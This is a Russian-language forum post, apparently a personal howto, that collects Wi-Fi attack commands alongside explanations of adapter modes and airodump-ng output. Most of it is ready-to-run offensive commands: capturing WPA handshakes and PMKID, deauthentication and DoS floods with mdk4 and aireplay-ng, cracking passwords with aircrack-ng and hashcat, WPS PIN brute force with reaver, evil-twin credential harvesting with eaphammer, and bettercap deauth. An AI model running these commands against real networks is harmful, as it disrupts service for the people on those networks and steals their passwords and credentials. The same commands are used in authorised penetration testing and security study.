"Форум на сайте Чагадаева"
Чагадаев как он есть => Руководства (howto) => Тема начата: adc от 22 Октября 2023 года, 01:02
-
Fluxion
• Wi-Fi Hacking Mind Map v1.0 by Jérémy Brun-Nouvion - https://github.com/koutto/pi-pwnbox-rogueap/blob/main/mindmap/WiFi-Hacking-MindMap-v1.pdf
• Атаки на WPA2-Enterprise, Rogue AP Evil Twin - https://habr.com/ru/articles/761450/
• Атаки на WPA2-Enterprise, методология взлома WPA3 - https://habr.com/ru/companies/bastion/articles/777182/
• Пентест WPA-Enterprise: от теории к практике - https://habr.com/ru/articles/850756/
• Атака EAP-Mirror на WPA2-Enterprise и 802.1x - https://www.youtube.com/watch?v=ehfE3_ZIDH0
• Online Hash Crack - https://www.onlinehashcrack.com/
-
Режимы работы Wi-Fi адаптера
- Managed mode (client mode) — пакеты, не предназначенные этому адаптеру, а также повреждённые, отбрасываются, остальные передаются внутрь ОС. Обычный режим работы.
- Monitor mode (rfmon mode) — драйвер не фильтрует пакеты и передаёт всё, что улавливает антенна, в ОС. Пакеты с неверной контрольной суммой не отбрасываются и их можно увидеть (например, в Wireshark).
- Promiscuous mode («беспорядочный режим») — драйвер передаёт в ОС пакеты, полученные в рамках сети, к которой мы сейчас подключены (associated), но, в отличие от обычного режима, не отбрасывает пакеты, предназначенные другим клиентам этой сети. Пакеты других сетей игнорируются. Как и в managed mode, драйвер убирает из переданных в ОС пакетов низкоуровневые заголовки канала. Режим работает только когда адаптер уже успешно подключён к некоей сети.
★ ★ ★
Вывести параметры подключения по Wi-Fi и настройки сети
iwconfig wlan0 ; ifconfig wlan0 ; ip route ; cat /etc/resolv.conf
★ ★ ★
Отключить в NetworkManager управление интерфейсом wlan1 - для текущего сеанса
nmcli dev set wlan1 managed no
Отключить в NetworkManager управление интерфейсом wlan1 - в конфигурационном файле
[keyfile]
unmanaged-devices=interface-name:wlan1
★ ★ ★
Посмотреть в каком режиме работают Wi-Fi интерфейсы
iwconfig
Перевести Wi-Fi интерфейс wlan1 в режим мониторинга - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up
Перевести Wi-Fi интерфейс wlan1 в режим мониторинга, остановить мешающие процессы - средствами airmon-ng
airmon-ng check kill
airmon-ng start wlan1
Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами airmon-ng; запустить NetworkManager и wpa_supplicant
airmon-ng stop wlan1
systemctl start NetworkManager
systemctl start wpa_supplicant.service
Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type managed
ip link set wlan1 up
iwconfig
-
Список беспроводных сетей (значения столбцов)
- BSSID — уникальный MAC-адрес беспроводной сети (6 чисел в шестнадцатеричном формате, разделённых двоеточиями).
- PWR — уровень сигнала, отрицательное число, чем ближе к 0 — тем сигнал сильнее. Для комфортной работы — до -50, для видеосвязи — до -65, для VoIP — до -75. Значения ниже -85 и в особенности ниже -90 можно считать крайне слабым уровнем. Зависит как от мощности передатчика, так и от коэффициента усиления антенны в принимающем адаптере (внешние адаптеры имеют усиление 0-12 dB, внешние 1-2-метровые всенаправленные антенны — до 24 dB).
- Beacons — число переданных точкой доступа «маячков» — пакетов, оповещающих находящиеся рядом устройства о существовании этой беспроводной сети, уровне сигнала, её имени (BSSID/ESSID) и прочей информации. Используется для подключения. Обычно точки доступа передают маячки каждые 100 мсек (10 раз в секунду), но интервал можно увеличить до 1 сек. Отсутствие маячка не говорит об отсутствии беспроводной сети — в скрытом (hidden) режиме точка доступа не передаёт маячков, но к ней можно подключиться, если знать точное имя сети.
- #Data — число пакетов с данными, которые пришли от этой точки доступа. Это может быть HTTP-трафик, ARP-запросы, запросы на авторизацию (handshake) и прочее. Если к сети не подключен ни один клиент или если он ничего не передаёт, то это значение не меняется и может быть 0.
- #/s — число пакетов с данными в секунду (значение #Data, делённое на время наблюдения за этой сетью).
- CH — номер канала.
- MB — скорость передачи (ширина канала) в Мбит/с. Точка в конце обозначает, что точка доступа поддерживает короткую преамбулу (short preamble). Можно увидеть значения 11, 54, 54e.
- ENC — тип беспроводной сети — OPN (открытая), WEP, WPA, WPA2.
- CIPHER — тип шифрования данных после handshake, TKIP или CCMP.
- AUTH — механизм аутентификации для передачи временного ключа, PSK (обычная авторизация по единому паролю для WPA(2)), MGT (WPA(2) Enterprise с отдельным сервером с ключами RADIUS), OPN (открытая).
- ESSID — имя беспроводной сети (может не быть уникальным, так как его задаёт пользователь; для всех внутренних операций используется BSSID).
Список беспроводных сетей и клиентов (значения столбцов)
- BSSID — MAC-адрес точки доступа, к которой подключён клиент. Если указано "not associated" — клиент отключён от всех сетей, но адаптер работает (возможно, он ищет доступные сети).
- STATION — MAC-адрес клиента.
- PWR — уровень сигнала от клиента. Чем ближе к 0, тем клиент ближе/сигнал мощнее.
- Rate — когда airodump-ng запущен с фиксацией канала, этот столбец показывает частоту передачи пакетов с данными от точки доступа к клиенту (слева от дефиса) и от клиента обратно (справа).
- Lost — число потерянных пакетов, которые наша система (не клиент) не зарегистрировала. Это легко вычислить, так как в передаваемых пакетах есть счётчик.
- Frames (Packets) — число пакетов с данными, которые мы уловили от этого клиента (см. #Data в первой таблице).
- Probe — список ESSID-имён беспроводных сетей, к которым клиент готов подключиться.
Горячие клавиши airodump-ng
"a" - переключить режим отображения: точки доступа, клиенты, точки доступа и клиенты
"s" - изменить сортировку
"o" - включить/выключить цвет
пробел - остановить/запустить обновление данных на экране
★ ★ ★
Для работы с airodump-ng необходимо сначала перевести Wi-Fi интерфейс в режим мониторинга!
Мониторинг эфира - интерфейс wlan1; диапазоны 2,4 ГГц и 5 ГГц; выводить производителя, параметры WPS и время работы точек доступа
airodump-ng wlan1 --band abg --wps --manufacturer --uptime
Мониторинг эфира - интерфейс wlan1; диапазоны 2,4 ГГц и 5 ГГц; точка (-и) доступа с именем "MyAP"; выводить производителя, параметры WPS и время работы точек доступа; сохранять пакеты в файл wifi
airodump-ng wlan1 --band abg --wps --manufacturer --uptime --essid "MyAP" -w wifi
★ ★ ★
Захват трафика - интерфейс wlan1, канал 1, сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 -w wifi
Захват трафика - интерфейс wlan1, канал 1, точка доступа с BSSID 54..., сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
-
PMKID (Pairwise Master Key Identifier) — производная (результат вычисления хеш-функции) от ключа PMK (Pairwise Master Key — парный главный ключ, результат вычисления хеш-функции от пароля сети). Трансляция PMKID в эфир — часть стандарта 802.11r (реализован в большинстве роутеров и обычно включён по умолчанию), который описывает механизм быстрого роуминга в Wi-Fi-сетях с несколькими точками доступа и позволяет ускорить переподключение клиентского устройства к новой точке доступа.
Запустить airodump-ng - интерфейсе wlan1, канал 1, точка доступа с BSSID 54..., сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
Либо запустить hcxdumptool - интерфейсе wlan1, точка доступа с BSSID 54..., сохранять пакеты в файл pmkid.cap
hcxdumptool -i wlan1 -c 149b -w pmkid.cap --filterlist_ap=54:C2:50:AC:AE:C9 --filtermode=2
hcxdumptool -i wlan1 -c 149b -w pmkid.cap
-
Деаутентификация
aireplay-ng wlan1 --deauth 20 -a <MAC точки доступа> -c <MAC подключённого клиента>
mdk4 wlan1 d -c <канал> -E <SSID>
mdk4 wlan1 d -c 1 -E 52:FF:20:90:98:C0
Beacon Flooding (generate many fake APs seen by clients - client confusion, crash network scanners)
mdk4 wlan1 b -a -w nta -m
Authentication DoS (simulate many clients - freeze/reset AP)
mdk4 wlan1 a -m -a 52:FF:20:90:98:C0
EAPOL Start Injection (keep AP busy with fake sessions - disable handling of legitimate clients)
mdk4 wlan1 e -t 52:FF:20:90:98:C0
EAPOL Logoff Injection (kick clients from AP)
mdk4 wlan1 e -t 52:FF:20:90:98:C0 -l
-
Подобрать хэш для пароля из дампа в файле wifi-01.cap
aircrack-ng wifi-01.cap -w /usr/share/dict/wordlist-probable.txt
aircrack-ng wifi-01.cap -w /!Dic/rockyou.txt
Очистить дамп от всех данных, кроме WPA handshake
wpaclean wifi-01_cleaned.cap wifi-01.cap
Конвертировать дамп от airodump-ng в вид, понятный hashcat
Подобрать хеш для пароля из файла wifi-01.hash
hcxpcapngtool wifi-01.cap -o wifi-01.hash
hashcat -m 22000 -a 0 wifi-01.hash /!Dic/rockyou.txt -o wifi-01.hash.result --session my-ses1
• Отдельная тема по hashcat - https://adc.su/forum/index.php?topic=6337
-
Существует два типа WPS:
• WPS с кнопкой — её нужно нажать на точке доступа и на клиенте с интервалом меньше пары минут;
• WPS в виде PIN-кода из 8-ми цифр — на клиенте нужно ввести тот же код, что и на точке доступа.
Математически из 8-ми цифр может быть 100 000 000 комбинаций. Однако первые 4 и следующие 3 цифры проверяются независимо друг от друга, а последняя цифра вычисляется как контрольная сумма предыдущих 7-ми, что сокращает брутфорс до 11 000 возможных комбинаций и делает возможным такую атаку.
Для работы необходимо сначала перевести Wi-Fi интерфейс в режим мониторинга!
wifite -i wlan1
wash -U -p -i wlan1
reaver -i wlan1 -vv --pixie-dust -b <BSSID>
oneshot.py -i wlan1
-
В WPA2-Personal (Wi-Fi Protected Access 2 - Personal) используется единый всех клиентов данной беспроводной сети PSK (Pre-Shared Key) — статический ключ (пароль, кодовое слово) минимальной длиной 8 символов, который задается в настройках точки доступа, и шифрование AES (Advanced Encryption Standard).
В WPA2-Enterprise MGT (Machine-Generated Token) вместо PSK используется аутентификация по протоколу 802.1X на сервере RADIUS (Remote Authentication Dial-In User Service), при этом у каждого пользователя свои логин и пароль, что снижает риск компрометации учётных данных.
Создать сертификат RADIUS для точки доступа (необходим для любой атаки, затрагивающей EAP)
eaphammer --cert-wizard
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP"
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --creds
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала самые слабые методы EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate weakest --creds
Создать поддельную точку доступа для сбора учётных данных - интерфейс wlan1, канал 11, имя "MyAP", предложить сначала EAP-GTC, затем перейти к более надёжным методам для ускорения согласования EAP
eaphammer -i wlan1 --channel 11 --auth wpa-eap --essid MyAP --negotiate balanced --creds
-
bettercap — the Swiss Army knife for Wi-Fi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks.
bettercap -iface wlan1
wifi.recon on
set ticker.commands 'clear; wifi.show'
ticker on
wifi.recon.channel 9
wifi.deauth 58:23:8c:7e:ed:13
bettercap WEB UI - http://127.0.0.1:8080/ , username: user, password: pass.
bettercap -iface wlan1 -eval "ui on"